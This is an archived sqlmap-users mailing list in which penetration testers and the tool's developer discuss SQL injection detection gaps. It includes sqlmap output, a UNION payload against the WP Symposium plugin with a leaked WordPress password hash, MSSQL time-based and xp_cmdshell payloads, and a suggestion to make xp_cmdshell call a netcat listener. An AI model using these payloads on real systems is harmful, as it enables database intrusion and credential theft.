[08:58:28] [INFO] target URL appears to be UNION injectable with 1 columns
[08:58:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20
columns'
[08:58:29] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[08:58:31] [INFO] testing 'MySQL UNION query (random number) - 22 to 40
columns'
[08:58:32] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[08:58:33] [INFO] testing 'MySQL UNION query (random number) - 42 to 60
columns'
[08:58:35] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[08:58:36] [INFO] testing 'MySQL UNION query (random number) - 62 to 80
columns'
[08:58:38] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[08:58:39] [INFO] testing 'MySQL UNION query (random number) - 82 to 100
columns'
[08:58:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:58:42] [INFO] testing 'Generic UNION query (random number) - 1 to 20
columns'
[08:58:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[08:58:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40
columns'
[08:58:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[08:58:48] [INFO] testing 'Generic UNION query (random number) - 42 to 60
columns'
[08:58:49] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[08:58:50] [INFO] testing 'Generic UNION query (random number) - 62 to 80
columns'
[08:58:52] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[08:58:53] [INFO] testing 'Generic UNION query (random number) - 82 to 100
columns'
[08:58:54] [INFO] checking if the injection point on POST parameter 'tray'
is a false positive
POST parameter 'tray' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 2049
HTTP(s) requests:
---
Parameter: tray (POST)
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=getMailMessage&tray=in_deleted AND
9095=BENCHMARK(5000000,MD5(0x6e434246))-- QPnA&mid=1
---
[08:59:48] [INFO] testing MySQL
[08:59:48] [WARNING] it is very important not to stress the network adapter
during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses
(option '--time-sec')? [Y/n]
[08:59:51] [INFO] confirming MySQL
[08:59:53] [INFO] adjusting time delay to 1 second due to good response
times
[08:59:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[08:59:53] [INFO] fetched data logged to text files under
'/home/bperry/.sqlmap/output/172.31.16.26'

[*] shutting down at 08:59:53

bperry@ubuntu:~/tools/sqlmap$

On Mon, Dec 15, 2014 at 10:54 AM, Miroslav Stampar <
mir...@gm...> wrote:
>
> Hi.
>
> I don't see a reason why this form of UNION test would be any different
> than the regular used by sqlmap. Can you please send me the traffic file
> for such run (... --flush-session -t traffic.txt) along with console
> output?
>
> Bye
> On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...>
> wrote:
>
>> Hello!
>>
>> Playing around with the following vulnerabivlity:
>>
>> http://www.exploit-db.com/exploits/35505/
>>
>>
>> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
>> result in a response from the server with the hash of the first user:
>>
>> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
>> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>>
>>
>> However, sqlmap only finds a time based injection. Looking at sqlmap
>> through burp, I do see sqlmap doesn't try an injection syntax like the one
>> used in the PoC. It may be useful to add a syntax of UNION (SELECT
>> CONCAT(blah, blah, blah) FROM blah).
>>
>> Just a thought!
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it

[Miroslav S. <mir...@gm...>]

Hi.

I don't see a reason why this form of UNION test would be any different
than the regular used by sqlmap. Can you please send me the traffic file
for such run (... --flush-session -t traffic.txt) along with console
output?

Bye
On Dec 15, 2014 5:50 PM, "Brandon Perry" <bpe...@gm...> wrote:

> Hello!
>
> Playing around with the following vulnerabivlity:
>
> http://www.exploit-db.com/exploits/35505/
>
>
> Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
> result in a response from the server with the hash of the first user:
>
> 1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
> (SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]
>
>
> However, sqlmap only finds a time based injection. Looking at sqlmap
> through burp, I do see sqlmap doesn't try an injection syntax like the one
> used in the PoC. It may be useful to add a syntax of UNION (SELECT
> CONCAT(blah, blah, blah) FROM blah).
>
> Just a thought!
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] WP Symposium 14.10 UNION-able, but sqlmap doesn't detect it

[Brandon P. <bpe...@gm...>]

Hello!

Playing around with the following vulnerabivlity:

http://www.exploit-db.com/exploits/35505/


Using a payload such as 'action=getMailMessage&tray=in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- &mid=1' does
result in a response from the server with the hash of the first user:

1[split]$P$BbXpOww1mX0g3gf5TxXz53Iu/S5ryu.[split]in_deleted = 1 UNION
(SELECT user_pass FROM wp_users WHERE ID=1) LIMIT 1, 1 -- [split]


However, sqlmap only finds a time based injection. Looking at sqlmap
through burp, I do see sqlmap doesn't try an injection syntax like the one
used in the PoC. It may be useful to add a syntax of UNION (SELECT
CONCAT(blah, blah, blah) FROM blah).

Just a thought!


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] MsSQL - wait command

[hooshmand k <hoo...@gm...>]

1) "waitfor delay '0:0:0'" makes no delay and ​"waitfor delay '0:0:5'"
makes5 seconds delay and so on.
2) I tried again with --tamper=between​ and sqlmap verified the
vulnerability.
3) using the tor in timebased techniques is not the best choice but I
preferred to be anonymous in pentesting.

Best Regards

On Mon, Dec 8, 2014 at 2:38 PM, Miroslav Stampar <mir...@gm...
> wrote:

> For sure it is. sqlmap gives you a huge nagging message in such case
> (network latency...blaballa).
>
> Bye
>
> On Mon, Dec 8, 2014 at 12:06 PM, Robin Wood <ro...@di...nja> wrote:
>
>> Wouldn't it be a bad idea trying to do a time based attack over Tor?
>>
>> Robin
>>
>> On 8 December 2014 at 11:00, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > Hi.
>> >
>> > 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
>> > 2) sqlmap says "false positive or unexploitable injection point
>> detected".
>> > Is there a possibility that the character > is filtered?
>> > 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries
>> to use
>> > in "false positive check" phase. Then you'll see what fails.
>> >
>> > Bye
>> >
>> > On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...>
>> wrote:
>> >>
>> >> Hi,
>> >>
>> >> There is a website that vulnerable to SQL injection. I have checked and
>> >> I'm sure there is blind sql injection vulnerability but the sqlmap
>> could not
>> >> find this.
>> >> I tried this command:
>> >>  ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5
>> --random-agent
>> >> --risk 3 --level 3 --technique=T --dbms="MsSQL"
>> >> and the output was something like this:
>> >> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
>> >> time-based blind' injectable
>> >> [INFO] checking if the injection point on GET parameter 'search' is a
>> >> false positive
>> >> [WARNING] false positive or unexploitable injection point detected
>> >> [WARNING] GET parameter 'search' is not injectable
>> >>
>> >>
>> >> the "search" parameter is vulnerable to this payload: '); waitfor delay
>> >> '0:0:0' --
>> >>
>> >> Did I make a mistake or the sqlmap did not find that?
>> >>
>> >> Best Regards
>> >>
>> >>
>> >>
>> ------------------------------------------------------------------------------
>> >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> >> from Actuate! Instantly Supercharge Your Business Reports and
>> Dashboards
>> >> with Interactivity, Sharing, Native Excel Exports, App Integration &
>> more
>> >> Get technology previously reserved for billion-dollar corporations,
>> FREE
>> >>
>> >>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> >> _______________________________________________
>> >> sqlmap-users mailing list
>> >> sql...@li...
>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >>
>> >
>> >
>> >
>> > --
>> > Miroslav Stampar
>> > http://about.me/stamparm
>> >
>> >
>> ------------------------------------------------------------------------------
>> > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> > from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> > with Interactivity, Sharing, Native Excel Exports, App Integration &
>> more
>> > Get technology previously reserved for billion-dollar corporations, FREE
>> >
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>> >
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
http://about.me/hooshmand
Public Key <http://scriptics.ir/pub_key/hooshmand_pub.asc>

Re: [sqlmap-users] MsSQL - wait command

[Miroslav S. <mir...@gm...>]

For sure it is. sqlmap gives you a huge nagging message in such case
(network latency...blaballa).

Bye

On Mon, Dec 8, 2014 at 12:06 PM, Robin Wood <ro...@di...nja> wrote:

> Wouldn't it be a bad idea trying to do a time based attack over Tor?
>
> Robin
>
> On 8 December 2014 at 11:00, Miroslav Stampar
> <mir...@gm...> wrote:
> > Hi.
> >
> > 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
> > 2) sqlmap says "false positive or unexploitable injection point
> detected".
> > Is there a possibility that the character > is filtered?
> > 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to
> use
> > in "false positive check" phase. Then you'll see what fails.
> >
> > Bye
> >
> > On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...>
> wrote:
> >>
> >> Hi,
> >>
> >> There is a website that vulnerable to SQL injection. I have checked and
> >> I'm sure there is blind sql injection vulnerability but the sqlmap
> could not
> >> find this.
> >> I tried this command:
> >>  ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5
> --random-agent
> >> --risk 3 --level 3 --technique=T --dbms="MsSQL"
> >> and the output was something like this:
> >> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
> >> time-based blind' injectable
> >> [INFO] checking if the injection point on GET parameter 'search' is a
> >> false positive
> >> [WARNING] false positive or unexploitable injection point detected
> >> [WARNING] GET parameter 'search' is not injectable
> >>
> >>
> >> the "search" parameter is vulnerable to this payload: '); waitfor delay
> >> '0:0:0' --
> >>
> >> Did I make a mistake or the sqlmap did not find that?
> >>
> >> Best Regards
> >>
> >>
> >>
> ------------------------------------------------------------------------------
> >> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> >> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> >> with Interactivity, Sharing, Native Excel Exports, App Integration &
> more
> >> Get technology previously reserved for billion-dollar corporations, FREE
> >>
> >>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> >> _______________________________________________
> >> sqlmap-users mailing list
> >> sql...@li...
> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >>
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> ------------------------------------------------------------------------------
> > Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> > from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> > with Interactivity, Sharing, Native Excel Exports, App Integration & more
> > Get technology previously reserved for billion-dollar corporations, FREE
> >
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> > _______________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> >
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] MsSQL - wait command

[Robin W. <ro...@di...>]

Wouldn't it be a bad idea trying to do a time based attack over Tor?

Robin

On 8 December 2014 at 11:00, Miroslav Stampar
<mir...@gm...> wrote:
> Hi.
>
> 1) Shouldn't "waitfor delay '0:0:0'" make no delay?
> 2) sqlmap says "false positive or unexploitable injection point detected".
> Is there a possibility that the character > is filtered?
> 3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to use
> in "false positive check" phase. Then you'll see what fails.
>
> Bye
>
> On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...> wrote:
>>
>> Hi,
>>
>> There is a website that vulnerable to SQL injection. I have checked and
>> I'm sure there is blind sql injection vulnerability but the sqlmap could not
>> find this.
>> I tried this command:
>>  ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent
>> --risk 3 --level 3 --technique=T --dbms="MsSQL"
>> and the output was something like this:
>> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
>> time-based blind' injectable
>> [INFO] checking if the injection point on GET parameter 'search' is a
>> false positive
>> [WARNING] false positive or unexploitable injection point detected
>> [WARNING] GET parameter 'search' is not injectable
>>
>>
>> the "search" parameter is vulnerable to this payload: '); waitfor delay
>> '0:0:0' --
>>
>> Did I make a mistake or the sqlmap did not find that?
>>
>> Best Regards
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] MsSQL - wait command

[Miroslav S. <mir...@gm...>]

Hi.

1) Shouldn't "waitfor delay '0:0:0'" make no delay?
2) sqlmap says "false positive or unexploitable injection point detected".
Is there a possibility that the character > is filtered?
3) Please run sqlmap with -v 3 and use the payloads that sqlmap tries to
use in "false positive check" phase. Then you'll see what fails.

Bye

On Mon, Dec 8, 2014 at 11:51 AM, hooshmand k <hoo...@gm...> wrote:

> Hi,
>
> There is a website that vulnerable to SQL injection. I have checked and
> I'm sure there is blind sql injection vulnerability but the sqlmap could
> not find this.
> I tried this command:
>  ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent
> --risk 3 --level 3 --technique=T --dbms="MsSQL"
> and the output was something like this:
> [INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
> time-based blind' injectable
> [INFO] checking if the injection point on GET parameter 'search' is a
> false positive
> [WARNING] false positive or unexploitable injection point detected
> [WARNING] GET parameter 'search' is not injectable
>
>
> the "search" parameter is vulnerable to this payload: '); waitfor delay
> '0:0:0' --
>
> Did I make a mistake or the sqlmap did not find that?
>
> Best Regards
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] MsSQL - wait command

[hooshmand k <hoo...@gm...>]

Hi,

There is a website that vulnerable to SQL injection. I have checked and I'm
sure there is blind sql injection vulnerability but the sqlmap could not
find this.
I tried this command:
 ./sqlmap.py -u 'target' -p search --tor --tor-type=SOCKS5 --random-agent
--risk 3 --level 3 --technique=T --dbms="MsSQL"
and the output was something like this:
[INFO] GET parameter 'search' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[INFO] checking if the injection point on GET parameter 'search' is a false
positive
[WARNING] false positive or unexploitable injection point detected
[WARNING] GET parameter 'search' is not injectable


the "search" parameter is vulnerable to this payload: '); waitfor delay
'0:0:0' --

Did I make a mistake or the sqlmap did not find that?

Best Regards

Re: [sqlmap-users] Is xp_cmdshell actived? Why it isn't working?

[Brandon P. <bpe...@gm...>]

Open up a netcat listener and make xp_cmdshell telnet into it as a test.

On Sunday, December 7, 2014, Rodrigo Zanatta Silva <
rod...@gm...> wrote:

> yeah... but... What I did make sense? I tested and for any value it only
> delay for the else value.
>
> I can't read any file until now. Everything I did fail.
>
> Is there another way to check if the xp_cmdshell is really working? I am
> out of idea now.
>
> 2014-12-07 17:32 GMT-02:00 Miroslav Stampar <mir...@gm...
> <javascript:_e(%7B%7D,'cvml','mir...@gm...');>>:
>
>> You have to redirect output to an output file and read it afterwards.
>> xp_cmdshell by itself doesn't return anything than the return code.
>>
>> Bye
>> On Dec 7, 2014 8:31 PM, "Rodrigo Zanatta Silva" <
>> rod...@gm...
>> <javascript:_e(%7B%7D,'cvml','rod...@gm...');>> wrote:
>>
>>> You don't need just to have it activated?  You say I can't run the EXEC?
>>> Any other way to avoid it?
>>>
>>> Is there anything I can do? Humm. Come in mind to impersonate another
>>> user and pray they can do this.
>>>
>>> 2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...
>>> <javascript:_e(%7B%7D,'cvml','mir...@gm...');>>:
>>>
>>>> No execution rights?
>>>>
>>>> Bye
>>>> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <
>>>> rod...@gm...
>>>> <javascript:_e(%7B%7D,'cvml','rod...@gm...');>> wrote:
>>>>
>>>>> Hi. I am doing a pen test in the Microsoft SQL Server 2008 R2 and I
>>>>> can see that the xp_cmdshell is active.
>>>>>
>>>>> IN the table *master.sys.configurations*, the column *value_in_use *show
>>>>> it is 1, so it is active!! But, every command that I tried to use didn't
>>>>> result any value. I just tried the most obvious:
>>>>>
>>>>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result
>>>>> = 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>>>>
>>>>> But it just waint 5 second. Any idea why this happens?
>>>>>
>>>>>
>>>>> ------------------------------------------------------------------------------
>>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>>> from Actuate! Instantly Supercharge Your Business Reports and
>>>>> Dashboards
>>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>>> more
>>>>> Get technology previously reserved for billion-dollar corporations,
>>>>> FREE
>>>>>
>>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>>> _______________________________________________
>>>>> sqlmap-users mailing list
>>>>> sql...@li...
>>>>> <javascript:_e(%7B%7D,'cvml','sql...@li...');>
>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>
>>>>>
>>>
>

-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

Re: [sqlmap-users] Is xp_cmdshell actived? Why it isn't working?

[Rodrigo Z. S. <rod...@gm...>]

yeah... but... What I did make sense? I tested and for any value it only
delay for the else value.

I can't read any file until now. Everything I did fail.

Is there another way to check if the xp_cmdshell is really working? I am
out of idea now.

2014-12-07 17:32 GMT-02:00 Miroslav Stampar <mir...@gm...>:

> You have to redirect output to an output file and read it afterwards.
> xp_cmdshell by itself doesn't return anything than the return code.
>
> Bye
> On Dec 7, 2014 8:31 PM, "Rodrigo Zanatta Silva" <
> rod...@gm...> wrote:
>
>> You don't need just to have it activated?  You say I can't run the EXEC?
>> Any other way to avoid it?
>>
>> Is there anything I can do? Humm. Come in mind to impersonate another
>> user and pray they can do this.
>>
>> 2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...>:
>>
>>> No execution rights?
>>>
>>> Bye
>>> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <
>>> rod...@gm...> wrote:
>>>
>>>> Hi. I am doing a pen test in the Microsoft SQL Server 2008 R2 and I can
>>>> see that the xp_cmdshell is active.
>>>>
>>>> IN the table *master.sys.configurations*, the column *value_in_use *show
>>>> it is 1, so it is active!! But, every command that I tried to use didn't
>>>> result any value. I just tried the most obvious:
>>>>
>>>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result =
>>>> 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>>>
>>>> But it just waint 5 second. Any idea why this happens?
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>>> with Interactivity, Sharing, Native Excel Exports, App Integration &
>>>> more
>>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>>
>>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>

Re: [sqlmap-users] Is xp_cmdshell actived? Why it isn't working?

[Miroslav S. <mir...@gm...>]

You have to redirect output to an output file and read it afterwards.
xp_cmdshell by itself doesn't return anything than the return code.

Bye
On Dec 7, 2014 8:31 PM, "Rodrigo Zanatta Silva" <
rod...@gm...> wrote:

> You don't need just to have it activated?  You say I can't run the EXEC?
> Any other way to avoid it?
>
> Is there anything I can do? Humm. Come in mind to impersonate another user
> and pray they can do this.
>
> 2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...>:
>
>> No execution rights?
>>
>> Bye
>> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <
>> rod...@gm...> wrote:
>>
>>> Hi. I am doing a pen test in the Microsoft SQL Server 2008 R2 and I can
>>> see that the xp_cmdshell is active.
>>>
>>> IN the table *master.sys.configurations*, the column *value_in_use *show
>>> it is 1, so it is active!! But, every command that I tried to use didn't
>>> result any value. I just tried the most obvious:
>>>
>>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result =
>>> 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>>
>>> But it just waint 5 second. Any idea why this happens?
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>>> Get technology previously reserved for billion-dollar corporations, FREE
>>>
>>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sql...@li...
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>

Re: [sqlmap-users] Is xp_cmdshell actived? Why it isn't working?

[Rodrigo Z. S. <rod...@gm...>]

You don't need just to have it activated?  You say I can't run the EXEC?
Any other way to avoid it?

Is there anything I can do? Humm. Come in mind to impersonate another user
and pray they can do this.

2014-12-07 17:25 GMT-02:00 Miroslav Stampar <mir...@gm...>:

> No execution rights?
>
> Bye
> On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <
> rod...@gm...> wrote:
>
>> Hi. I am doing a pen test in the Microsoft SQL Server 2008 R2 and I can
>> see that the xp_cmdshell is active.
>>
>> IN the table *master.sys.configurations*, the column *value_in_use *show
>> it is 1, so it is active!! But, every command that I tried to use didn't
>> result any value. I just tried the most obvious:
>>
>> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result =
>> 0) WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>>
>> But it just waint 5 second. Any idea why this happens?
>>
>>
>> ------------------------------------------------------------------------------
>> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
>> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
>> with Interactivity, Sharing, Native Excel Exports, App Integration & more
>> Get technology previously reserved for billion-dollar corporations, FREE
>>
>> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>

Re: [sqlmap-users] Is xp_cmdshell actived? Why it isn't working?

[Miroslav S. <mir...@gm...>]

No execution rights?

Bye
On Dec 7, 2014 6:19 PM, "Rodrigo Zanatta Silva" <
rod...@gm...> wrote:

> Hi. I am doing a pen test in the Microsoft SQL Server 2008 R2 and I can
> see that the xp_cmdshell is active.
>
> IN the table *master.sys.configurations*, the column *value_in_use *show
> it is 1, so it is active!! But, every command that I tried to use didn't
> result any value. I just tried the most obvious:
>
> DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0)
> WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'
>
> But it just waint 5 second. Any idea why this happens?
>
>
> ------------------------------------------------------------------------------
> Download BIRT iHub F-Type - The Free Enterprise-Grade BIRT Server
> from Actuate! Instantly Supercharge Your Business Reports and Dashboards
> with Interactivity, Sharing, Native Excel Exports, App Integration & more
> Get technology previously reserved for billion-dollar corporations, FREE
>
> http://pubads.g.doubleclick.net/gampad/clk?id=164703151&iu=/4140/ostg.clktrk
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] Is xp_cmdshell actived? Why it isn't working?

[Rodrigo Z. S. <rod...@gm...>]

Hi. I am doing a pen test in the Microsoft SQL Server 2008 R2 and I can see
that the xp_cmdshell is active.

IN the table *master.sys.configurations*, the column *value_in_use *show it
is 1, so it is active!! But, every command that I tried to use didn't
result any value. I just tried the most obvious:

DECLARE @result int; EXEC @result = xp_cmdshell 'echo a'; IF (@result = 0)
WAITFOR DELAY '00:01:00' ELSE WAITFOR DELAY '00:00:05'

But it just waint 5 second. Any idea why this happens?

Re: [sqlmap-users] cleaning up after yourself

[Rodrigo Z. S. <rod...@gm...>]

it create the "sqlmapfile" TABLE. I was in shock when I see that this was
in server because it give a huge way to discovery a vulnerability.

2014-12-07 15:02 GMT-02:00 Rodrigo Zanatta Silva <
rod...@gm...>:

> I already see that when trying to read a file in microsoft sql server it
> create a "sqlmapfile" and didn't drop in the end. This is not a smart thing
> to do.
>
> By the way, I already tried to read any file using the sqlmap and none
> worked. I see some absolute path in the server but without success until
> now.
>
> Any idea from a single file that I can read just to see that it is
> working? Any common file in the Microsoft SQL SErver 2008 R2?
>
> 2014-12-05 19:30 GMT-02:00 Robin Wood <ro...@di...nja>:
>
> Fair enough, all valid points. I'd not looked at the fixed table names
>> till looking at cleanup so hadn't thought about any of it before.
>>
>> Robin
>>
>> On 5 December 2014 at 21:27, Miroslav Stampar
>> <mir...@gm...> wrote:
>> > Well, if you think like that, used auxiliary table names are also static
>> > (sqlmapfile, sqlmapfilehex and sqlmapoutput). But... leaving table
>> names and
>> > proc names for defensive purposes just like that around will only create
>> > panic. Also, non-skiddy will easily detect that there is already a
>> > proc/table name with the same name causing the problem and he will
>> easily
>> > adapt either sqlmap or drop older entities (e.g. via --cleanup).
>> >
>> > Why wouldn't you revoke privileges for creating of tables and/or
>> procedures
>> > for defensive purposes rather than laying around sqlmap... inside
>> database?
>> >
>> > Bye
>> >
>> > On Fri, Dec 5, 2014 at 10:19 PM, Robin Wood <ro...@di...nja> wrote:
>> >>
>> >> Does this mean as a defence we could create a procedure with the same
>> >> name which would block the creation?
>> >>
>> >> Robin
>> >>
